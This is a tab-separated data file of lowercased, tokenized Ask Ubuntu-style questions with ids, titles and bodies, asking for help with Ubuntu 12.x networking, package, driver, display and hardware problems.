258143	unable to connect wired network	i am using ubuntu 12.10 . my internet connection was working fine . i tried to connect college lan after changing ip but it did n't work . then i changed to previous ip and tried with to connect but now it is showing connection established but there is no internet access . output of ifconfig is not having wlan and eth1 is showing interrupt17 . $ ifconfig eth1 link encap : ethernet hwaddr 00:26:22 : c8:2d:2a inet addr:192.168.61.57 bcast:192.168.61.255 mask:255.255.255.0 inet6 addr : fe80 : :226:22ff : fec8:2d2a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5551 errors:0 dropped:0 overruns:0 frame:0 tx packets:232 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:542393 ( 542.3 kb ) tx bytes:46828 ( 46.8 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:912 errors:0 dropped:0 overruns:0 frame:0 tx packets:912 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:64128 ( 64.1 kb ) tx bytes:64128 ( 64.1 kb ) what can i do to get this working ?
258151	how to install subversion client in ubuntu	i have looked at this question : how do i install svn ? we already use sudo apt-get install subversion to install subversion on the server . what should i do in order to install the subversion client ? svn client is only needed and we do n't need the server on all machines . also we do n't need gui access on ubuntu machines .
258153	set audio output device per application	is it possible to configure pulseaudio , so that some applications route audio through the headphones , other applications go to the main speakers , and some applications go to both ( as it does now ) ?
258154	can not download ubuntu 12.10 from the site	when i am trying to download ubuntu 12.10 32-bit , it is asking for a username and password of gluh.nith.ac.in thank you
258157	ubuntu 12.10 ( 32bit ) takes very long to install - horribly slow it 's a compliment	i 'm really new on ubuntu so i have a question , but first of all let me tell everything i know before asking : a week ( or two ) ago i bought an second-hand pc ( just for using it with ubuntu ) and i 've successfully installed ubuntu 12.10 ( in a very short time , like 30-90 min , did n't count at all - the main thing it 's that the installation process went very well ) . the next week i played with it ( installed printer , scanner , made updates , played some games etc . ) untill i `` broke '' it and did n't find any solution ( after a very long research ) . the last thing i did was to install php + curl for a mini-script , but also on that day in the upper right corner appeared a red triangle or something like that , which said something about not able to install an update ( or something like that , i did n't have internet connection at all that day so i just ignored it ) . after 2-3 hours it froze and i was never been able to boot again ( tried nomodeset , apt-get update & & apt-get upgrade etc , this does n't count at all ) . the live disc ( from a usb ) played well so i decided for a fresh install since i did n't have anything important on it ( recovered all files via cli + ftp ) . after i decided to install it again i let the pc run for ~6hours and it did n't finish at all . last night ( 10pm gmt+2 ) i let it install overnight . it 's already 12.00am and it still has not finished . now it 's at : ubuntu_supplicant [ 2282 ] : group rekeying completed with macaddr ( it 's actually a mac address ) - this line appears multiple times from about 9:00am ( along with other lines like `` cd / & & run-parts -- report /etc/cron/hourly ) . the configuration of pc : intel celeron e3300 2,50ghz x 2 ram : 1,8gb ( i bought knowing it was 2gb ) hdd : 250gb graphic card : do n't really know ( i did n't care at all - i have better pc & laptop for design & gaming ) . q : it 's normally what it happens ? more than 14 hours and it did n't install yet ? why i have this problem , since the first time worked very well ? the orange bar looks like it 's at about 75 % . thanks & sorry for my bad english : - )
258158	apt-get broken on kubuntu 12.04	i just wanted to add my little stone , so i tried to do an install of `` wine '' on a kubuntu installed on my laptop ( amd64 quad proc , 12.04 , strictly and regularly updated and maintained ) which leads directly to a load of apt problems . in addition , i have now 4 different instances of graphics apps for package/software maintenance , all in submenu k/system : software update , muon software manager , ubuntu software center , muon update manager . in addition , i still have a broken apt system , i do n't understand from what ... i followed the instructions given on that other thread https : //bugs.launchpad.net/ubuntu/+source/dpkg/+bug/983543 , shortened to : dpkg -i /var/cache/apt/archives/*.deb dpkg -- configure -a this gave me the final result : dpkg : des problèmes de dépendances empêchent la configuration de wine1.4-common : wine1.4-common dépend de wine1.4 ( = 1.4-0ubuntu4.1 ) ; cependant : le paquet wine1.4 n'est pas installé . dpkg : erreur de traitement de wine1.4-common ( -- configure ) : problèmes de dépendances - laissé non configuré dpkg : des problèmes de dépendances empêchent la configuration de wine1.4-amd64 : wine1.4-amd64 dépend de wine1.4-common ( = 1.4-0ubuntu4.1 ) ; cependant : le paquet wine1.4-common n'est pas encore configuré . dpkg : erreur de traitement de wine1.4-amd64 ( -- configure ) : problèmes de dépendances - laissé non configuré paramétrage de libdrm-intel1 : i386 ( 2.4.39-0ubuntu0.1 ) ... paramétrage de libgl1-mesa-dri : i386 ( 8.0.4-0ubuntu0.3 ) ... traitement des actions différées ( « triggers » ) pour « libc-bin » ... ldconfig deferred processing now taking place des erreurs ont été rencontrées pendant l'exécution : wine1.4-common wine1.4-amd64 i am still searching for a solution , also to simplify those duplicate graphic apps for software management , would appreciate any help , thanks !
258160	hiding active windows from docky	i want to use docky just as an application launcher , i do n't want it to show my active windows . i just want application shortcuts on it . is there a way to do that ?
258168	steam 64-bit no longer in ubuntu software centre or app repository	the title pretty much says it . i attempted to download steam from the software centre , but it gave me an error ( something along the lines of `` can not reach source : apps.ubuntu.com/cat/applications/steam64/ '' , i did n't write it down ) . i tried reconnecting , but that did n't work . when i restarted the software centre , the entry for steam ( 64-bit ) had vanished . i checked the web page for steam 64-bit in the apps repository , but i got a page not found error . thoughts ?
258174	ubuntu 12.04 freezes randomly at dell inspiron 14z	i got the problem that my ubuntu 12.04 system entirely freezes , including there will be no mouse or keyboard action , at random situations with the consequence that there is nothing i can do but a hard reset . there is no particular situation in which this issue occurs but often while using eclipse ide or being in chrome browser . sometimes while being on the desktop , too . my notebook is a dell inspiron 14z with ivy-bridge cpu and intel hd graphics . any ideas ?
258176	setting to let mouse events pass through gui application	i am using compiz to make an app transparent . i would like to be able to click through the app as well . q : there are any settings in the gui ( compiz ) or via cli to be able to set up an application ( based on it 's class like in compiz ) to not capture mouse events and just pass through it , or even better to enable capturing the mouse when a key combination is pressed ( ex : left alt + left ctrl + mouse click ) ? use case : i am watching a conference online ( let 's say google i/o ) , i am setting the opacity of the video app via compiz ( ccsm ) to be very transparent , and only increase it 's opacity when there is something that i need to see , otherwise i just do other jobs in the background , and keep an eye on the video if something interesting appears . what i would like is to be able to click through the app , because sometimes i need to change the app position just to click something and it 's interfering with my work-flow . as far as i know i did this a few years back , but ca n't remember how , not even what i used , maybe i did it in e16 not compiz/gnome/unity , but i just ca n't remember . thank you
258178	ubuntu one for android without google play	is there a way to get the ubuntu one apk file ? my android device is not supported by google .
258179	wireless lan connection does n't work on ubuntu 12.10 , how to fix it ?	yesterday i installed ubuntu 12.10 on my dell studio 1537 . all was fine until after a short time the wlan connection stopped working and i was disconnected . the same thing happened when i re-installed ubuntu . the network has stopped working and disappears from `` network connections '' what can i do ?
258180	why does running ps result in a `` can not allocate memory '' error ?	i am using ubuntu 12.04 server . after upgrading to kernel 3.2.0-38-generic , ps takes a long time and finally reports as : xrealloc : realloc ( -2147483648 ) failedcannot allocate memory booting with the previous kernel , 3.2.0-37-generic restores the normal behavior of ps . the only clue i have is that it does not occur when i login with local user account but only when logging in with an authorized windows ad account ( samba/winbind setup ) . any ideas on how to resolve the issue ?
258182	ubuntu 12.04 is sluggish	i have a lenovo g580 ( 4gb ddr3 , ~500 gb hdd , intel i3 ) . i installed ubuntu using the in-windows installer on my windows 7 . ubuntu was ( and still is ) slightly sluggish . by sluggish i mean , the os gui is perfectly responsive , but an app 's gui sometimes just hangs/freezes for a second , while the rest works , but the app itself ca n't be accessed ( happens with google chrome mostly , but other applications suffer , too ) and it fixes itself after a few seconds . i recently installed windows 8 and it appears to be the same . another problem i am experiencing is that , when i try to boot it up , from the windows 8 boot menu , it does n't work right away . i have to select ubuntu , and then i need to reboot the laptop ( long press the power button on this laptop ) , which then automatically skips the windows 8 boot menu and goes to the ubuntu login screen . also , it takes a really long while while it loads up and gets to the login screen ( at first it 's just staring purple/pink for around 20 seconds , and then when the logo and that load indicator appear , it is loading for 2 to 5 minutes ) . i really love using linux for development ( since i do n't have to constantly use git to test it ) . but , this sluggishness is really getting in the way . : (
258184	dell laptop battery backup 1.30 hours only with ubuntu 12.04 . how can the battery backup be increased ?	dell laptop model : n5110 ( inspiron 15r ) display : 15.6 '' battery : 6 cell graphics : nvidia geforce 525m 1gb ( no driver for ubuntu ) , working on intel graphics 1gb os : ubuntu 12.04 ( precise ) 64 bit dell laptop battery backup 1.30 hours only with ubuntu 12.04 . how can the battery backup be increased ?
258186	terminal check remaining battery health	i 've tried the following command cat /proc/acpi/battery/bat0/info and there it is no such file or directory acpi outputing this : battery 0 : unknown , 100 % is there another way to check the battery 's health ?
258191	setting up python to start learning	so i am interested in learning to code in python . i started with html and css which requires no set up just using gedit to write my code and testing on chromium . i was recently told to learn to do more with html and css . i would need to get a setup for java and start learning some of that . however i am more interested in learning python . so far all i know ubuntu 12.10 comes with a version of python . i need to know what would it take to get things set up to the point i can actually open python 3.3.0 on ubuntu 12.10 and starting trying out commands ?
258192	how to set value of java_home variable	my /etc/profile code is : # /etc/profile : system-wide .profile file for the bourne shell ( sh ( 1 ) ) # and bourne compatible shells ( bash ( 1 ) , ksh ( 1 ) , ash ( 1 ) , ... ) . if [ `` $ ps1 '' ] ; then if [ `` $ bash '' ] & & [ `` $ bash '' ! = `` /bin/sh '' ] ; then # the file bash.bashrc already sets the default ps1 . # ps1='\h : \w\ $ ' if [ -f /etc/bash.bashrc ] ; then . /etc/bash.bashrc fi else if [ `` `id -u` '' -eq 0 ] ; then ps1= ' # ' else ps1= ' $ ' fi fi fi # the default umask is now handled by pam_umask . # see pam_umask ( 8 ) and /etc/login.defs . if [ -d /etc/profile.d ] ; then for i in /etc/profile.d/*.sh ; do if [ -r $ i ] ; then . $ i fi done unset i fi java_home=/usr/lib/jvm/java-6-sun export java_home when i am running command echo $ java_home i am getting : exportib/jvm/java-6-sun i was expecting /usr/lib/jvm/java-6-sun . please point how to get the expected value .
258197	why ca n't i download bcmwl-kernel-source ?	i have a wireless issue with my hp netbook . i found a fix here : ubuntu 12.10 , wireless not working but when i type sudo apt-get install -- reinstall bcmwl-kernel-source it tells me that bcmwl-kernel-source could not be downloaded ! any suggestions ? the command lspci -nn gives me the number 14e4:4727 for the controller , so that 's why i thought this fix above would help . ( i am using ubuntu 12.10 . )
258202	multi-core compression tools	what compression tools are available in ubuntu that can benefit from a multi-core cpu .
258206	selectively route traffic in split-vpn 12.04	i often work remotely . i use the network manager to set up my vpn connection , which has worked pretty well . the vpn i have set up currently using the password with certificates ( tls ) type . what i want to do is only route certain traffic through the vpn , and all other traffic over the normal local internet connection . is this possible ? just to help explain my situation i will give an example of the type of connections i usually have to make with the vpn network . we have an `` intranet '' web site set up on our work network , so this web site is only accessible to me when i use vpn , but is accessed the same way i access other sites , like google or askubuntu.com . i often connect to a desktop computer over the vpn connection via remote desktop , where i enter the name ) ip address ) of the desktop computer , username , and password . i connect to a mysql server using mysql workbench , where you enter an ip address , username and password . i often connect to linux servers using ssh . for all of the above connections i need the vpn . however i also do some normal web surfing , as well as connecting to resources outside of the work network ( gmail , stack overflow , gaming , etc. ) . for these connections i wish not to access via the vpn connection because these connections do not need my vpn , the vpn just makes this much slower . i have tried the technique describe in this link : http : //darrenwatt.com/split-tunnel-ubuntu/ this did not seem to work for me . specifically , i could n't connect to the `` intranet '' site after checking the `` use this connection only for resource on its network '' check box and connection the vpn . does anyone know how i can selectively route traffic through the vpn ? does this make sense ? thanks ! !
258212	internet is not working in ubuntu	i 've recently downloaded ubuntu as dual boot on my toshiba satellite c640 along with windows 7. and i have internet broadband connection . but when i start mozilla firefox in ubuntu.. it 's saying `` server not found ! '' could you please help me out. ! ! i 'm very new to linux environment thanks.. !
258213	ubuntu 12.10 , can not resize any window	i am using the unity interface and i usally work with maximized windows . however lately i noticed that i can not resize windows . i can get them maximized and to normal state . when in normal state i move the mouse to the border and the cursor changes to the `` resize cursor '' but then nothing happens when trying to drag the border . starting a guest session i can see that resizing works so it has something to do with my profile . lately i used gsettings to disable overlay scrollbars but even resetting to default values does not solve the problem and i am not pretty sure the problem started after using gsettings . any solution that does not require resetting everyting ? as an extreme measure what files should i delete to reset the profile settings ? thanks
258214	android mirror - juc600 for ubuntu	i was recently reading an article about a device that mirrors an android device onto a computer . once connected you can then interact with it via the computers keyboard as well as amplify the screen . this leads to my actual question has anyone seen a similar project that will run on ubuntu ? key features display your phone on your pc magnify & rotate your phone 's screen on your large display copy and paste text from your pc to your phone or vice versa use your keyboard and mouse to directly type or click any programs transfer data through the file manager get incoming call and text message notifications directly on your pc take quick and easy screenshots of your phone references android mirror website
258218	how do i search for and install the latest version of mingw-w64	i wish to install the latest version of mingw-w64 and was told the best way is to install it via ubuntu 's apt-get command . how do i search for and install the latest version of mingw-w64 ? i need the 64-bit version . what commands must i issue ? as always , thanks in advance for your help .
258219	how do i make apt-get install less noisy ?	if i use apt-get install -qq mono-devel , i expect it to be quiet except for errors , according to the help : -qq no output except for errors instead i get : extracting templates from packages : 100 % selecting previously unselected package binfmt-support . ( reading database ... 84711 files and directories currently installed . ) unpacking binfmt-support ( from ... /binfmt-support_2.0.8_i386.deb ) ... selecting previously unselected package cli-common . unpacking cli-common ( from ... /cli-common_0.8.2_all.deb ) ... selecting previously unselected package libgdiplus . unpacking libgdiplus ( from ... /libgdiplus_2.10-3_i386.deb ) ... selecting previously unselected package libmono-2.0-1 . unpacking libmono-2.0-1 ( from ... /libmono-2.0-1_2.10.8.1-1ubuntu2.2_i386.deb ) ... selecting previously unselected package libmono-2.0-dev . unpacking libmono-2.0-dev ( from ... /libmono-2.0-dev_2.10.8.1-1ubuntu2.2_i386.deb ) ... selecting previously unselected package libmono-corlib4.0-cil . unpacking libmono-corlib4.0-cil ( from ... /libmono-corlib4.0-cil_2.10.8.1-1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-system-xml4.0-cil . unpacking libmono-system-xml4.0-cil ( from ... /libmono-system-xml4 . and more ... in fact , a couple hundred lines worth of output . this does not appear to match up with no output except for errors . how do i actually get apt-get install to print out only when there are errors keeping it from installing ?
258220	how to upgrade from 10.04 to 12.10	how do i get ubuntu to upgrade from version 10.04 to version 12.10 ? it seems like the installation cd just stops reading at some point and all that is displayed on the desktop is ubuntu 12.10 . . . . with no further action not even from the hdd ! ?
258225	configuring amd raedon 6700m on dell 4600m precision . ubuntu 12.10	i 'm having a nightmare with ubuntu 12.10 due to my graphic card . i have a dell precision 4600m laptop coming with an amd raedon 6700m hd graphic card working on ubuntu 12.10 . recently , i wanted to use 2 identical screens that i have in my office . first , i used one of them and i got the error related to the resolution . i modified the xorg.conf to a bigger virtual resolution . it worked ( i used the display manager in the `` system settings '' ) . on the other hand , i could n't use the second one ( using hdmi ) . from the `` software sources '' , i modified the the driver to the open source one and everything worked fine for the three screens . after some time , i noticed that , sometimes , i had to force restart my pc because it was stuck with black screen on the boot ( after choosing between windows and ubuntu ) . i did that many times . after some research on internet , i decided to install the catalyst driver and here started the whole war ! the problem now is that i can use only two screens ( if i try to use the third screen , an error saying `` could not set the configuration for crtc 148 '' ) . even if the catalyst tool allow me to set the 3 screens , when i reboot ( i need a reboot every time i modify the configuration in catalyst control center ) , i ca n't set them through the `` display manager '' . the other problem is that when i use one of the screens with my laptop screen , i get one of them with half screen disabled where i ca n't reach it with the mouse . my configuration : ubuntu 12.10 . catalyst driver packaging version : 9.00.11-120920a-147436c-ati . two identical screens ' resolution : 1280 × 1024 . laptop screen 's resolution : 1366 × 768 . here is my xorg.conf : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` 0-lvds '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` targetrefresh '' `` 60 '' option `` position '' `` 2560 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' option `` preferredmode '' `` 1366x768 '' endsection section `` monitor '' identifier `` 0-dfp9 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` targetrefresh '' `` 60 '' option `` position '' `` 1280 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' option `` preferredmode '' `` 1280x1024 '' endsection section `` monitor '' identifier `` 0-crt1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1280x1024 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` monitor-lvds '' `` 0-lvds '' option `` monitor-dfp9 '' `` 0-dfp9 '' option `` monitor-crt1 '' `` 0-crt1 '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 3926 1366 depth 24 endsubsection endsection thanks for the help : )
258227	where can i buy the ubuntu phone to start developing apps ?	is the ubuntu phone available anywhere yet ? i want start developing apps . i am very impatient to start to develop on real ubuntu phone .
258233	how do i get the ralink wireless controller working on an hp envy 7212nr ?	the output of lshw -c network reads as follows : warning : you should run this program as super-user . *-network unclaimed description : network controller product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:0a:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory:73510000-7351ffff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0b:00.0 logical name : eth0 version : 07 serial : a0 : b3 : cc:4d:66:1a size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory:73404000-73404fff memory:73400000-73403fff warning : output may be incomplete or inaccurate , you should run this program as super-user . ~ $ ifconfig eth0 link encap : ethernet hwaddr a0 : b3 : cc:4d:66:1a inet addr:192.168.1.9 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :a2b3 : ccff : fe4d:661a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:18695 errors:0 dropped:0 overruns:0 frame:0 tx packets:16815 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:17332774 ( 17.3 mb ) tx bytes:2545565 ( 2.5 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4000 errors:0 dropped:0 overruns:0 frame:0 tx packets:4000 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:399550 ( 399.5 kb ) tx bytes:399550 ( 399.5 kb ) ~ $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : a0 : b3 : cc:4d:66:1a capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.9 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 ~ $ lspci -nn 08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader [ 10ec:5229 ] ( rev 01 ) 0a:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:3290 ] 0a:00.1 bluetooth [ 0d11 ] : ralink corp. device [ 1814:3298 ] 0b:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 07 ) 0a:00.0 network controller : ralink corp. device 3290 subsystem : hewlett-packard company device 18ec flags : bus master , fast devsel , latency 0 memory at 73510000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : 0a:00.1 bluetooth : ralink corp. device 3298 subsystem : hewlett-packard company device 18ec flags : bus master , fast devsel , latency 0 memory at 73500000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : i can use the wired internet but can not see any of the wireless in the menu , i am new to ubuntu so please help !
258236	question : installing amd driver error ( tools missing )	i wanted to use amd 's driver for my computer on their website since i did n't like ubuntu 's recommended driver . my graphics card is a radeon hd 5700 and i used this link and picked the latest beta , downloaded it , unzipped to my desktop changed the properties to run as a program , ran through the terminal and everything was going fine until this happened . it says that i am missing tools for installation but when i look at installation requirements on the amd website for this driver it seems like i have them all . please someone help me . image 2
258239	tf2 problem on ubuntu 12.10	hello ubuntu community ! ! ! as soon as i found out that steam is available on linux , formatted my win7 and installed ubuntu 12.10 . everything works fine , had some minor trouble with nvidia but fixed it . have this old desktop pc : intel c2d e4600 2,4 x2 , geforce 9800gt , 2 gb of ram installed steam , installed tf2 and tried it out . everything starts great , even faster then win7 . main menu of tf2 looks fine . trouble starts when i try to join servers . first thing i noticed is that it takes a long time when retrieving server info.. when in game the lagg is unbelievable , no way the game can be played . its like my gpu is way too weak for this game.. the thing is that i played it on win7 with these same exact settings on 1440x900 , ( you can tell by the little stars that those are recommended settings ) and game was running without any problem even in biggest fights . http : //img717.imageshack.us/img717/4561/2013021900001.jpg also tryed lowering everything to low/disable and its the same only with really ugly graphics . using 310 drivers for nvidia provided by software sources . please help , willing to try any advice . solved ! ! ! this helped : http : //www.dedoimedo.com/computers/ubuntu-pangolin-nvidia.html to everyone that has same issue : just lunch nvidia x server settings , under open gl settings turn off sync to vblank . : ) that was sucking my cpu dry , was not gpu after all . now the game runs without any problems . only thing now is the long `` retrieving server info '' time.. but i 'm sure steam and ubuntu will fix that soon enough . thanx everyone ! ubuntu rocks ! !
258240	after intalling rabbitvcs in 12.04 , ca n't find the rabbitvcs menu	i have ubuntu 12.04 lts . i installed rabbitvcs following the steps mentioned in the link below . http : //linuxdrops.com/install-rabbitvcs-svn-git-client-on-ubuntu-12-1012-0411-1011-04/ however after restart , i am not getting the rabbitvcs menu if i right click any folder . i have read lot of articles , everyone seems to be using it without any issues . why only i am facing the problem . i am new to linux . anyone please guide me . i want to use rabbitvcs since the features are too good .
258241	kubuntu with splotchy fonts in gtk apps	in kubuntu i occasionally get splotchy fonts in gtk applications . splotchy-ness can range from slightly annoying to completely unreadable . as far as i can tell , the problem only occurs in gtk apps . below is an example screenshot of chromium . the text drawn by gtk in the widgets ( etc ) is blotchy , and the bit of text below that , drawn by webkit , is fine . and below is a screenshot of my kde-gtk settings . the settings are at their defaults , with the oxygen-gtk widget style and the `` use kde fonts in gtk+ applications '' selection checked . usually , i can fix the fonts by tweaking the font settings and then returning them to default , but that is not working today , and i would like to find a permanent fix . even the `` use another font '' option is not working with various other fonts chosen -- they are all splotchy .
258245	how to get root using windows installer for 10.04 lts desktop ?	i used windows installer for installing 10.04 lts desktop . when i try sudo password root and enter login password it gives sudo : password : command not found .
258248	wireshark 1.8.2 problem	i am using ubuntu 12.04 lts . i have experienced a small problem . i installed wireshark 1.8.2 from ppa : eugenesan/ppa repository . since that time when i try to launch it , this error appears '' wireshark : symbol lookup error : wireshark : undefined symbol : read_keytab_file . i have same problem with tshark . wireshark wo n't launch . help me two solve this issue .
258249	ca n't figure out how to install my graphic drivers [ nvidia gt 520m ]	i give up , i 've been reading forums all day and most of the stuff i 've tried has led to a blank screen after logging in after reboot ( no menus ) which i 've fixed by re-installing as i found it fastest as it was a fresh install anyways : p my laptop is a samsung np-rv520-s02se with a nvidia gt 520m graphics card . as you probably understand i 'm fairly new to ubuntu . i 've also tried downloading the .run file from nvidia.com/drivers which gives me some error after loading for a while or i might be opening it wrong . any kind soul could help me out getting my drivers installed properly ?
258252	keep vga signal sending when using vga switchbox	i am trying to mimic the vga projector setup i had on arch linux . i have three laptops connected through a vga switchbox to an external projector . when i was using archlinux i used xrandr to start using the projector and when , afterwards , switching to another laptop and back , the vga signal was still transmitting on the first laptop so that i could switch directly back to this first signal . now on ubuntu the laptop seems to `` redo '' the connection to the projector whenever i switch back to it , and this way the projector shows its `` off '' screen for some seconds and needs to resync to the laptops vga channel ... very disturbing when doing live vj sessions ... does anyone know how to make the vga signal continuous after its first setup ? which package does the external monitor switching in ubuntu ( maybe i can turn it off ? ) or other solutions for going back to direct vga switching ( as in archlinux ) ?
258254	how do i open pcmanfm in a specific directory ?	i ca n't find the answer to this simple question . what command should i use to open pcmanfm in a specific directory ? as an example , i want to run : pcmanfm /home/truc/musique . however , this does n't seem to work and the manpage is n't very helpful .
258255	change ip range and subnet mask	i want to connect a gateway to my computer that has ip adress : 192.168.0.50 the problem is that my pc `` reads '' from 192.168.1.x how can i change it to 192.168.0.x ? and set subnet mask to 255.255.255.0 ? now when i connect the gateway i ca n't access it 's ip .
258256	ca n't get vlc or tvtime to 'see ' the tv card	i have vlc & tvtime installed but neither see the tv card , both only input the stream from the web-cam . dmesg says frontend = 0 for the leadtek winfast 2000xp expert card i have installed . can anyone suggest what i 'm overlooking ? partial lspci -v 04:07.0 multimedia video controller : conexant systems , inc. cx23880/1/2/3 pci video and audio decoder ( rev 05 ) subsystem : leadtek research inc. leadtek winfast 2000xp expert flags : bus master , medium devsel , latency 32 , irq 21 memory at fd000000 ( 32-bit , non-prefetchable ) [ size=16m ] capabilities : < access denied > kernel driver in use : cx8800 kernel modules : cx8800 uname -r 3.7.0-7-generic lsmod module size used by rfcomm 37421 0 bnep 17670 2 bluetooth 183791 10 rfcomm , bnep parport_pc 31969 0 ppdev 12818 0 rc_winfast 12455 0 tuner_simple 21982 1 tuner_types 18999 1 tuner_simple tda9887 17667 1 tda8290 22062 0 tea5767 13078 0 tuner 26825 2 cx8800 32861 0 cx88xx 78299 1 cx8800 snd_hda_codec_hdmi 36053 1 rc_core 21213 3 rc_winfast , cx88xx tveeprom 17010 1 cx88xx binfmt_misc 17261 1 v4l2_common 20714 3 tuner , cx8800 , cx88xx snd_hda_codec_realtek 63540 1 uvcvideo 71377 0 snd_hda_intel 32761 5 snd_hda_codec 116443 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel videobuf2_core 39162 1 uvcvideo videodev 105500 6 tuner , cx8800 , cx88xx , v4l2_common , uvcvideo , videobuf2_core snd_usb_audio 105375 1 radeon 828599 3 snd_pcm 80891 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_usb_audio kvm_amd 54366 0 snd_hwdep 13273 2 snd_hda_codec , snd_usb_audio snd_usbmidi_lib 24226 1 snd_usb_audio snd_seq_midi 13133 0 kvm 376183 1 kvm_amd ttm 71439 1 radeon media 20528 2 uvcvideo , videodev btcx_risc 13401 2 cx8800 , cx88xx drm_kms_helper 45273 1 radeon snd_seq_midi_event 14476 1 snd_seq_midi videobuf2_vmalloc 12921 1 uvcvideo drm 227450 5 radeon , ttm , drm_kms_helper snd_seq 51281 2 snd_seq_midi , snd_seq_midi_event videobuf2_memops 13043 1 videobuf2_vmalloc videobuf_dma_sg 18711 2 cx8800 , cx88xx snd_rawmidi 25383 2 snd_usbmidi_lib , snd_seq_midi joydev 17098 0 snd_timer 24412 2 snd_pcm , snd_seq snd_seq_device 14138 3 snd_seq_midi , snd_seq , snd_rawmidi psmouse 75804 0 videobuf_core 25098 3 cx8800 , cx88xx , videobuf_dma_sg snd 62146 24 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_usb_audio , snd_pcm , snd_hwdep , snd_usbmidi_lib , snd_seq , snd_rawmidi , snd_timer , snd_seq_device microcode 18287 0 mac_hid 13038 0 sp5100_tco 13418 0 k10temp 12959 0 ati_agp 13178 0 soundcore 14600 1 snd i2c_algo_bit 13198 2 cx88xx , radeon i2c_piix4 13067 0 snd_page_alloc 14231 2 snd_hda_intel , snd_pcm serio_raw 13032 0 lp 13300 0 parport 40754 3 parport_pc , ppdev , lp hid_generic 12485 0 usbhid 45902 0 hid 82179 2 hid_generic , usbhid r8169 61496 0 linda @ linda : ~ $ dmesg|grep cx88 > [ 9.006801 ] cx88/0 : cx2388x v4l2 driver version 0.0.9 loaded [ 9.007933 ] cx88 [ 0 ] : subsystem : 107d:6613 , board : leadtek winfast 2000xp expert [ card=5 , autodetected ] , **frontend ( s ) : 0** [ 9.007934 ] cx88 [ 0 ] : tv tuner type 44 , radio tuner type -1 [ 9.293186 ] cx88 [ 0 ] : leadtek winfast 2000xp expert config : tuner=43 , eeprom [ 0 ] =0x01 [ 9.422223 ] input : cx88 ir ( leadtek winfast 2000xp as /devices/pci0000:00/0000:00:14.4/0000:04:07.0/rc/rc0/input11 [ 9.422308 ] rc0 : cx88 ir ( leadtek winfast 2000xp as /devices/pci0000:00/0000:00:14.4/0000:04:07.0/rc/rc0 [ 9.422313 ] cx88 [ 0 ] /0 : found at 0000:04:07.0 , rev : 5 , irq : 21 , latency : 32 , mmio : 0xfd000000 [ 9.425130 ] cx88 [ 0 ] /0 : registered device video1 [ v4l2 ] [ 9.425170 ] cx88 [ 0 ] /0 : registered device vbi0 [ 9.425199 ] cx88 [ 0 ] /0 : registered device radio0
